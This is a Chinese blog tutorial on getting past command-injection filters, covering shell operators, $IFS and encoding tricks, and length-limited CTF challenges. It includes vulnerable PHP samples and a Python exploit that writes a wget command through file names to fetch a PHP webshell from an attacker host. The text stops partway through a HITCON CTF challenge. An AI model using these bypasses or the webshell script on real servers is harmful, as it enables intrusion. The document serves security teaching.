<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>Bypass一些命令注入限制的姿势 | 七友 | 路漫漫其修远兮，吾将上下而求索</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="一些姿势">
    <meta name="description" content="文章首发于设置社区https://xz.aliyun.com/t/3918  命令注入OS命令注入(也称为shell注入)是一种web安全漏洞，它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令，通常会完全破坏应用程序及其所有数据。通常，攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分，利用信任关系将攻击转移到组织内的其他系统。 前置知识说到命令注入，我们不得不提到命令注">
<meta name="keywords" content="一些姿势">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypass一些命令注入限制的姿势">
<meta property="og:url" content="https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/index.html">
<meta property="og:site_name" content="七友">
<meta property="og:description" content="文章首发于设置社区https://xz.aliyun.com/t/3918  命令注入OS命令注入(也称为shell注入)是一种web安全漏洞，它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令，通常会完全破坏应用程序及其所有数据。通常，攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分，利用信任关系将攻击转移到组织内的其他系统。 前置知识说到命令注入，我们不得不提到命令注">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120174451-083fa032-1c98-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120174709-5a7fea96-1c98-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120174912-a3cd3eba-1c98-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120175948-1f648e6a-1c9a-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120180235-82c6e07a-1c9a-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120180631-0f960c1a-1c9b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120180724-2eeda8de-1c9b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120180945-82ca6a28-1c9b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120183457-0887a146-1c9f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120181515-47fd220e-1c9c-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120181135-c499e8ca-1c9b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120182144-2fae337c-1c9d-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120185231-7cab65c4-1ca1-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120185020-2e5c14cc-1ca1-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120181255-f41fd258-1c9b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120205644-d68d3ee4-1cb2-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120211733-bf383cdc-1cb5-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120221721-1a28f340-1cbe-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120235756-271eed3a-1ccc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190121100854-811f807e-1d21-1.png">
<meta property="og:updated_time" content="2019-05-14T16:29:34.242Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bypass一些命令注入限制的姿势">
<meta name="twitter:description" content="文章首发于设置社区https://xz.aliyun.com/t/3918  命令注入OS命令注入(也称为shell注入)是一种web安全漏洞，它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令，通常会完全破坏应用程序及其所有数据。通常，攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分，利用信任关系将攻击转移到组织内的其他系统。 前置知识说到命令注入，我们不得不提到命令注">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190120174451-083fa032-1c98-1.png">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">七友</h5>
          <a href="mailto:1920854803@qq.com" title="1920854803@qq.com" class="mail">1920854803@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/byqiyou" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/friends"  >
                <i class="icon icon-lg icon-friends"></i>
                friends
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/about"  >
                <i class="icon icon-lg icon-about"></i>
                about
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">Bypass一些命令注入限制的姿势</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">Bypass一些命令注入限制的姿势</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-02-01T02:12:06.000Z" itemprop="datePublished" class="page-time">
  2019-02-01
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#命令注入"><span class="post-toc-number">1.</span> <span class="post-toc-text">命令注入</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#前置知识"><span class="post-toc-number">2.</span> <span class="post-toc-text">前置知识</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#amp-amp"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">&amp;&amp;</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#管道符号"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">|(管道符号)</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#null"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">||</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#amp"><span class="post-toc-number">2.4.</span> <span class="post-toc-text">&amp;</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#分号"><span class="post-toc-number">2.5.</span> <span class="post-toc-text">;(分号)</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#和"><span class="post-toc-number">2.6.</span> <span class="post-toc-text">``和$()</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#和-1"><span class="post-toc-number">2.7.</span> <span class="post-toc-text">()和{}</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Shell-输入-输出重定向"><span class="post-toc-number">2.8.</span> <span class="post-toc-text">Shell 输入/输出重定向</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#正则表达式"><span class="post-toc-number">2.9.</span> <span class="post-toc-text">正则表达式</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#示例"><span class="post-toc-number">3.</span> <span class="post-toc-text">示例</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#一些常见的限制"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">一些常见的限制</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#通配符-和-的使用"><span class="post-toc-number">3.1.1.</span> <span class="post-toc-text">通配符*和?的使用</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#和-的使用"><span class="post-toc-number">3.1.2.</span> <span class="post-toc-text">[]和{}的使用</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#空格绕过"><span class="post-toc-number">3.1.3.</span> <span class="post-toc-text">空格绕过</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#关键字过滤绕过"><span class="post-toc-number">3.1.4.</span> <span class="post-toc-text">关键字过滤绕过</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#长度限制"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">长度限制</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#例题1"><span class="post-toc-number">3.2.1.</span> <span class="post-toc-text">例题1</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#例题2"><span class="post-toc-number">3.2.2.</span> <span class="post-toc-text">例题2</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#例题3"><span class="post-toc-number">3.2.3.</span> <span class="post-toc-text">例题3</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Reference"><span class="post-toc-number">4.</span> <span class="post-toc-text">Reference</span></a></li></ol>
        </nav>
    </aside>


<article id="post-Bypass一些命令注入限制的姿势"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">Bypass一些命令注入限制的姿势</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-02-01 10:12:06" datetime="2019-02-01T02:12:06.000Z"  itemprop="datePublished">2019-02-01</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <blockquote>
<p>文章首发于设置社区<a href="https://xz.aliyun.com/t/3918" target="_blank" rel="noopener">https://xz.aliyun.com/t/3918</a></p>
</blockquote>
<h1 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h1><p>OS命令注入(也称为shell注入)是一种web安全漏洞，它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令，通常会完全破坏应用程序及其所有数据。通常，攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分，利用信任关系将攻击转移到组织内的其他系统。</p>
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><p>说到命令注入，我们不得不提到命令注入中几个常用的符号。</p>
<h2 id="amp-amp"><a href="#amp-amp" class="headerlink" title="&amp;&amp;"></a>&amp;&amp;</h2><pre><code>语法格式如下：
command1 &amp;&amp; command2 [&amp;&amp; command3 ...]
1 命令之间使用 &amp;&amp; 连接，实现逻辑与的功能。
2 只有在 &amp;&amp; 左边的命令返回真（命令返回值 $? == 0），&amp;&amp; 右边的命令才会被执行。
3 只要有一个命令返回假（命令返回值 $? == 1），后面的命令就不会被执行。
</code></pre><h2 id="管道符号"><a href="#管道符号" class="headerlink" title="|(管道符号)"></a>|(管道符号)</h2><pre><code>| 表示管道，上一条命令的输出，作为下一条命令的参数
</code></pre><h2 id=""><a href="#" class="headerlink" title="||"></a>||</h2><pre><code>语法格式如下：
command1 || command2 [|| command3 ...]
1 命令之间使用 || 连接，实现逻辑或的功能。
2 只有在 || 左边的命令返回假（命令返回值 $? == 1），|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同，即实现短路逻辑或操作。
3 只要有一个命令返回真（命令返回值 $? == 0），后面的命令就不会被执行。
</code></pre><h2 id="amp"><a href="#amp" class="headerlink" title="&amp;"></a>&amp;</h2><pre><code>&amp; 表示将任务置于后台执行
</code></pre><h2 id="分号"><a href="#分号" class="headerlink" title=";(分号)"></a>;(分号)</h2><pre><code>多行语句用换行区分代码快，单行语句一般要用到分号来区分代码块
</code></pre><h2 id="和"><a href="#和" class="headerlink" title="``和$()"></a>``和$()</h2><pre><code>在bash中，$( )与` `（反引号）都是用来作命令替换的。
各自的优缺点：
1. ` ` 基本上可用在全部的 unix shell 中使用，若写成 shell脚本，其移植性比较高，但反单引号容易打错或看错。
2. $()更有可读性，但是$()并不是所有shell都支持。
</code></pre><h2 id="和-1"><a href="#和-1" class="headerlink" title="()和{}"></a>()和{}</h2><pre><code>如果希望把几个命令合在一起执行，shell提供了两种方法。既可以在当前shell也可以在子shell中执行一组命令。
(command1;command2;command3....)
{ command1;command2;command3…} #第一条命令必须与左边的括号有一个空格，最后一条命令一定要有分号

相同点：
()和{}都是把一串的命令放在括号里面,并且命令之间用;号隔开
不同点
()只是对一串命令重新开一个子shell进行执行,{}对一串命令在当前shell执行
()最后一个命令可以不用分号,{}最后一个命令要用分号
()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格
()和{}中括号里面的某个命令的重定向只影响该命令,但括号外的重定向则影响到括号里的所有命令
</code></pre><h2 id="Shell-输入-输出重定向"><a href="#Shell-输入-输出重定向" class="headerlink" title="Shell 输入/输出重定向"></a>Shell 输入/输出重定向</h2><p>来自菜鸟教程：</p>
<pre><code>大多数 UNIX 系统命令从你的终端接受输入并将所产生的输出发送回​​到您的终端。一个命令通常从一个叫标准输入的地方读取输入，默认情况下，这恰好是你的终端。同样，一个命令通常将其输出写入到标准输出，默认情况下，这也是你的终端。
</code></pre><pre><code>命令说明：
command &gt; file：将输出重定向到 file。
command &lt; file：将输入重定向到 file。
command &gt;&gt; file：将输出以追加的方式重定向到 file。
n &gt; file：将文件描述符为 n 的文件重定向到 file。
n &gt;&gt; file：将文件描述符为 n 的文件以追加的方式重定向到 file。
n &gt;&amp; m：将输出文件 m 和 n 合并。
n &lt;&amp; m：将输入文件 m 和 n 合并。
&lt;&lt; tag：将开始标记 tag 和结束标记 tag 之间的内容作为输入。

需要注意的是文件描述符 0 通常是标准输入（STDIN），1 是标准输出（STDOUT），2 是标准错误输出（STDERR）。
</code></pre><h2 id="正则表达式"><a href="#正则表达式" class="headerlink" title="正则表达式"></a>正则表达式</h2><pre><code>
^
匹配输入字符串的开始位置。

$
匹配输入字符串的结束位置。

*
匹配前面的子表达式零次或多次

+
匹配前面的子表达式一次或多次。

?
匹配前面的子表达式零次或一次。

{n}
n 是一个非负整数。匹配确定的 n 次。

{n,}
n 是一个非负整数。至少匹配n 次。

{n,m}
m 和 n 均为非负整数，其中n &lt;= m。最少匹配 n 次且最多匹配 m 次。

?
当该字符紧跟在任何一个其他限制符 (*, +, ?, {n}, {n,}, {n,m}) 后面时，匹配模式是非贪婪的。非贪婪模式尽可能少的匹配所搜索的字符串，而默认的贪婪模式则尽可能多的匹配所搜索的字符串。

.
匹配除换行符（\n、\r）之外的任何单个字符。

[xyz]
字符集合。匹配所包含的任意一个字符。
</code></pre><p>还有一些内置的通用字符簇</p>
<pre><code>[[:alpha:]] 任何字母
[[:digit:]] 任何数字
[[:alnum:]] 任何字母和数字
[[:space:]] 任何空白字符
[[:upper:]] 任何大写字母
[[:lower:]] 任何小写字母
[[:punct:]] 任何标点符号
[[:xdigit:]] 任何16进制的数字，相当于[0-9a-fA-F]
</code></pre><h1 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h1><h2 id="一些常见的限制"><a href="#一些常见的限制" class="headerlink" title="一些常见的限制"></a>一些常见的限制</h2><h3 id="通配符-和-的使用"><a href="#通配符-和-的使用" class="headerlink" title="通配符*和?的使用"></a>通配符<code>*</code>和<code>?</code>的使用</h3><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120174451-083fa032-1c98-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="和-的使用"><a href="#和-的使用" class="headerlink" title="[]和{}的使用"></a>[]和{}的使用</h3><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120174709-5a7fea96-1c98-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>{…}与[…]有一个很重要的区别。如果匹配的文件不存在，[…]会失去模式的功能，变成一个单纯的字符串，而{…}依然可以展开。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120174912-a3cd3eba-1c98-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><p>使用&lt;和&gt;</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120175948-1f648e6a-1c9a-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>使用特殊变量:<code>$IFS</code></p>
<pre><code>IFS的默认值为：空白（包括：空格，tab, 和新行)
</code></pre><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120180235-82c6e07a-1c9a-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="关键字过滤绕过"><a href="#关键字过滤绕过" class="headerlink" title="关键字过滤绕过"></a>关键字过滤绕过</h3><p>使用<code>$*</code>和<code>$@</code>，<code>$x</code>(x代表1-9),<code>${x}</code>(x&gt;=10)<br>PS：因为在没有传参的情况下，上面的特殊变量都是为空的<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120180631-0f960c1a-1c9b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>使用反斜杠</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120180724-2eeda8de-1c9b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>使用变量</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120180945-82ca6a28-1c9b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120183457-0887a146-1c9f-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>使用特殊变量${9}</p>
<pre><code>${9}对应空字符串
</code></pre><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120181515-47fd220e-1c9c-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>使用编码<br>base64<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120181135-c499e8ca-1c9b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><br>16进制<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120182144-2fae337c-1c9d-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120185231-7cab65c4-1ca1-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>8进制<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120185020-2e5c14cc-1ca1-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>使用双引号和单引号</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120181255-f41fd258-1c9b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>花括号还有一种用法：{command,argument}，</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120205644-d68d3ee4-1cb2-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>使用<code>%0a(\n)</code>，<code>%0d(\r)</code>，<code>%09(\t)</code>等字符也可以bypass一些过滤，这里就会不多去赘述了</p>
<h2 id="长度限制"><a href="#长度限制" class="headerlink" title="长度限制"></a>长度限制</h2><h3 id="例题1"><a href="#例题1" class="headerlink" title="例题1"></a>例题1</h3><pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
    <span class="token variable">$param</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'param'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$param</span><span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">17</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
        <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$param</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token delimiter">?></span>
</code></pre>
<p>很简单，长度不能大于等于17，直接在eval里面再用一个eval就可以了。<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120211733-bf383cdc-1cb5-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<h3 id="例题2"><a href="#例题2" class="headerlink" title="例题2"></a>例题2</h3><pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token function">shell_exec</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token delimiter">?></span>
</code></pre>
<p>这里要用到我们前面所讲到的重定向，<code>n &gt; file</code>：将文件描述符为 n 的文件重定向到 file。<br>既然我们不能一次执行一条完整的命令，我们可以分为多次<br>举个简单的例子</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120221721-1a28f340-1cbe-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>ls是默认以文件名排序的，所以我们为了控制我们命令的顺序，可以使用ls -t按时间逆序。<br>不过这里考虑到直接写shell有点麻烦（因为php中的一些符号用到shell中是有意义的，要各种转义，为了节省代码量我们直接用curl或者是wget从服务器dump一个shell下来）<br>exp如下：</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> requests
name<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">">php\\"</span><span class="token punctuation">,</span><span class="token string">">\\ 1.\\\\"</span><span class="token punctuation">,</span><span class="token string">">\\ -O\\\\"</span><span class="token punctuation">,</span><span class="token string">">cn\\\\"</span><span class="token punctuation">,</span><span class="token string">">\\ a.\\\\"</span><span class="token punctuation">,</span><span class="token string">">wget\\\\"</span><span class="token punctuation">]</span>
<span class="token comment" spellcheck="true">#可以修改hosts文件，让a.cn指向一个自己的服务器。</span>
<span class="token comment" spellcheck="true">#index.html是一个php的shell</span>
url<span class="token operator">=</span><span class="token string">"http://192.168.163.128/test.php"</span>
<span class="token keyword">for</span> x <span class="token keyword">in</span> name<span class="token punctuation">:</span>
    <span class="token keyword">print</span> x
    param<span class="token operator">=</span><span class="token punctuation">{</span><span class="token string">'1'</span><span class="token punctuation">:</span>x<span class="token punctuation">}</span>
    a<span class="token operator">=</span>requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">,</span>params<span class="token operator">=</span>param<span class="token punctuation">)</span>
param1<span class="token operator">=</span><span class="token punctuation">{</span><span class="token string">'1'</span><span class="token punctuation">:</span><span class="token string">'ls -t>a'</span><span class="token punctuation">}</span>
param2<span class="token operator">=</span><span class="token punctuation">{</span><span class="token string">'1'</span><span class="token punctuation">:</span><span class="token string">'sh a'</span><span class="token punctuation">}</span>
requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">,</span>params<span class="token operator">=</span>param1<span class="token punctuation">)</span>
requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">,</span>params<span class="token operator">=</span>param2<span class="token punctuation">)</span>
b<span class="token operator">=</span>requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">"http://192.168.163.128/1.php"</span><span class="token punctuation">)</span>
<span class="token keyword">if</span> b<span class="token punctuation">.</span>status_code <span class="token operator">==</span> <span class="token number">200</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span> <span class="token string">"ok!"</span>
<span class="token keyword">else</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span> <span class="token string">"bad!"</span>
</code></pre>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190120235756-271eed3a-1ccc-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>可以发现成功写了shell</p>
<h3 id="例题3"><a href="#例题3" class="headerlink" title="例题3"></a>例题3</h3><p>HITCON CTF 2017-BabyFirst Revenge</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
   <span class="token variable">$sandbox</span> <span class="token operator">=</span> <span class="token string">'/www/sandbox/'</span> <span class="token punctuation">.</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token string">"orange"</span> <span class="token punctuation">.</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'REMOTE_ADDR'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   @<span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token variable">$sandbox</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   @<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token variable">$sandbox</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&lt;=</span> <span class="token number">5</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
